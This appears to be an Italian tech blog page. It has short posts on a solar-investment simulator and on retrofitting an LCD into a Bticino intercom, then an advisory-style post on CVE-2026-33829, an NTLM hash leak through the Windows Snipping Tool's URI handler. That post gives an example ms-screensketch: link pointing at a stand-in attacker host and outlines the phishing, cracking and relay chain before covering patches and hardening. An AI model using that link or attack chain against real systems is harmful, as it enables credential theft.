ADS

giovedì 14 maggio 2026

Un comodo Simulatore di Fotovoltaico

Fornisco il link ad una pagina creata da me per verificare l'investimento fotovoltaico.
Nulla di troppo complesso, pochi dati e si sa in quanto si rientra del proprio investimento. Alcuni dati sono già predisposti come il costo al kWh impostato a 30€cent


https://sites.google.com/view/simfotovoltaico








mercoledì 13 maggio 2026

Recupero e Modernizzazione: Sostituire il Monitor CRT di un Videocitofono Bticino Swing con un Display LCD

Articolo a cura di un simpatizzante del blog

Spesso ci troviamo a gestire vecchi impianti di videocitofonica che, pur funzionanti nella logica di base, soffrono di obsolescenza tecnologica nei componenti visuali. È il caso del classico modulo interno Bticino Swing, equipaggiato originariamente con un piccolo tubo catodico (CRT) o primi modelli LCD ormai fuori produzione.

Dopo oltre due anni di sperimentazioni, errori e ripensamenti, presentiamo oggi il risultato finale di un progetto di "retrofit": la sostituzione del monitor originale Hanse (4 pollici TTF LCD) con un moderno pannello LCD da 4,3 pollici, comunemente utilizzato come monitor per retromarcia automobilistica.
La Sfida Tecnica

L'obiettivo era chiaro: mantenere l'estetica originale della cornetta Bticino sostituendo però il cuore tecnologico guasto o obsoleto. Il primo tentativo ha purtroppo portato a un blocco del sistema a causa di un adattamento errato, costringendo a utilizzare il citofono in modalità audio-only per lungo tempo. La lezione appresa? La pazienza e la precisione nei collegamenti sono fondamentali.

La seconda prova, quella definitiva, ha visto l'impiego di un monitor LCD da 4,3" con alimentazione a 12V. (link non affiliato)




Il Processo di Adattamento

L'intervento ha richiesto una modifica meccanica ed elettronica accurata:Smontaggio e Preparazione: È stato necessario rimuovere il tubo catodico e la scheda di controllo originale dal telaio plastico del modulo Bticino. Successivamente, il display è stato estratto dal suo contenitore plastico commerciale.
Modifica del Telaio: Per alloggiare il nuovo pannello, il telaio plastico originale è stato limato con precisione per ricavare lo spazio necessario, posizionando il nuovo LCD esattamente dove si trovava il vecchio monitor.
Elettronica e Sicurezza: Il connettore originale a 4 poli non era compatibile con le nuove esigenze. La soluzione è stata recuperare una morsettiera da un vecchio ricevitore FAAC.Dettaglio cruciale: Poiché il nuovo display assorbe circa 180mA, è stato inserito in serie all'alimentazione un fusibile da 250mA per proteggere il circuito da eventuali cortocircuiti o picchi di tensione.
Calibrazione: La regolazione di luminosità e contrasto è stata effettuata a citofono aperto durante la fase di collaudo, agendo sulla piccola PCB con tre pulsanti presente sul retro del display, che è stata lasciata nascosta all'interno del guscio.




Il Risultato Finale

Il sistema è ora pienamente operativo. La nuova integrazione permette di visualizzare il video con un ingombro minimo e un consumo energetico contenuto.

Nota sulla qualità video: Durante i test è emerso che la qualità dell'immagine, seppur accettabile sul nuovo schermo, risulta limitata non dal display LCD (che ha una buona risoluzione), ma dal vetrino del modulo camera esterno (PE). Dopo anni di esposizione agli agenti atmosferici, la lente esterna si è opacizzata, riducendo la nitidezza in ingresso. Questo conferma che, in questi recuperi, la catena della qualità è forte quanto il suo anello più debole: in questo caso, la camera esterna andrebbe pulita o sostituita per sfruttare appieno il nuovo monitor.




Conclusioni

Questo progetto dimostra come, con un po' di manualità e componenti di recupero o economici (come i monitor per auto), sia possibile dare una seconda vita a dispositivi che sembravano destinati alla discarica elettronica. Il rispetto per l'hardware esistente e la capacità di adattarlo alle tecnologie moderne è la chiave per un'elettronica più sostenibile e duratura.

Grazie al nostro collaboratore anonimo per aver condiviso questa dettagliata documentazione tecnica.

giovedì 7 maggio 2026

CVE-2026-33829 - Lo Snipping Tool che regala il tuo hash NTLM

Il succo della faccenda: clicci su un link, si apre lo Strumento di cattura di Windows come se niente fosse, e nel frattempo il tuo hash NTLMv2 (derivato dalla tua password di dominio o account locale) vola silenzioso verso un server controllato dall'attaccante. Nessun warning, nessun popup sospetto, zero sintomi visibili.


La Radice Tecnica

Lo Snipping Tool registra nel sistema un URI handler personalizzato chiamato ms-screensketch: (e ms-screenclip:), usato per aprire direttamente l'app tramite link dal browser o da altre app. Questo URI accetta un parametro filePath per indicare il file da aprire/modificare.

Il problema è brutalmente semplice: non c'è alcuna validazione del parametro filePath. Un attaccante può passargli un UNC path invece di un percorso locale:

Esempio:

ms-screensketch:edit?filePath=\\\\attacker.evil.com\\share\\badge.png

Quando Windows vede un percorso UNC (\\server\share\file), fa automaticamente una connessione SMB verso quel server. E quando apre una connessione SMB autenticata, trasmette automaticamente la risposta Net-NTLMv2 - ovvero un hash crittografico derivato dalla tua password - al server remoto.

Ecco un esempio fatto semplicemente su una cartella mappata:




La Catena d'Attacco (Attack Chain)

  1. Preparazione: L'attaccante mette in piedi un server SMB malevolo (es. con Responder) e crea un link ms-screensketch: con UNC path che punta a quel server

  2. Delivery: La vittima riceve il link via phishing email, pagina web compromessa, o messaggio Teams/Slack — mascherato da qualcosa di plausibile (es. "ritaglia la tua foto per il badge aziendale")

  3. Esecuzione: La vittima clicca e conferma l'apertura dello Strumento di cattura (unica interazione richiesta)

  4. Esfiltrazione silenziosa: Lo Snipping Tool tenta di caricare il file remoto via SMB → Windows invia automaticamente l'hash Net-NTLMv2 all'attaccante

  5. Post-exploitation: L'hash può essere:

    • Craccato offline con Hashcat/John the Ripper per recuperare la password in chiaro

    • Usato direttamente in un attacco NTLM Relay per autenticarsi ad altri servizi interni senza neanche craccare


Dati della Vulnerabilità

CampoDettaglio
CVECVE-2026-33829 nvd.nist
CVSS 3.14.3 (Medium) technochat
CWECWE-200 – Exposure of Sensitive Information
ComponenteWindows Snipping Tool (ms-screensketch: URI)
Scoperta daMarcos Díaz Castiñeiras – BlackArrow (Tarlogic) linkedin
Segnalata a Microsoft23 marzo 2026 redhotcyber
Patch rilasciata14 aprile 2026 (Patch Tuesday) technochat
PoC pubblicoSì, GitHub BlackArrow github

Perché il CVSS 4.3 Sottostima il Rischio Reale

Il punteggio "Medium" può ingannare. In ambienti Active Directory aziendali questo è un cazzo di problema serio per due motivi: [cybersecuritynews]

  • NTLM Relay: In reti dove NTLM non è bloccato/disabilitato e SMB signing non è enforced, l'hash può essere riutilizzato in tempo reale per autenticarsi a file server, SharePoint, Exchange  senza craccare nulla

  • Surface d'attacco enormissima: Lo Snipping Tool è preinstallato su ogni build di Windows, quindi potenzialmente colpisce ogni macchina Windows aziendale non aggiornata

Il MITRE ATT&CK mapping rilevante è T1550.002 – Pass the Hash per il movimento laterale.


Come Proteggersi

Fix immediato (obbligatorio):

  • Installare gli aggiornamenti di sicurezza di aprile 2026 su tutte le macchine Windows [redhotcyber]

Misure di hardening aggiuntive:

  • Bloccare il traffico SMB in uscita (porta 445) al perimetro della rete non dovrebbe mai uscire dall'infrastruttura interna [redhotcyber]

  • Monitorare connessioni SMB anomale in uscita con SIEM/EDR; BlackArrow ha già pubblicato query KQL specifiche per Microsoft Defender XDRx

  • Considerare la disabilitazione di NTLM dove possibile in favore di Kerberos (GPO: Network security: Restrict NTLM)

  • Abilitare SMB Signing obbligatorio su tutti i server per mitigare i relay attack

Per i Blue Team, SOC Prime ha già regole di detection dedicate per questo CVE.


Contesto Storico: Non è la Prima Volta

Questo attacco si inserisce in un pattern più ampio di URI handler abuse su Windows. Già nel 2025 era stata documentata una tecnica analoga con lo schema ms-photos:, e ad aprile 2026 era emerso un bug simile in Explorer (CVE-2026-32202) dove una patch Microsoft aveva essa stessa introdotto un leak di credenziali. Il problema sistemico è che Windows espone decine di URI handler registrati dalle sue app native, e la validazione dell'input in questi handler è storicamente lacunosa.


Verifica protezione

Se hai da WINVER una versione superiore a quella indicata in tabella ... Sei OK!

Versione WindowsBuild minima protettaCome verificare
Win 11 25H226200.8246winver oppure PowerShell
Win 11 24H226100.8246winver oppure PowerShell
Win 11 23H222631.6936winver oppure PowerShell
Win 10 22H219045.5858winver oppure PowerShell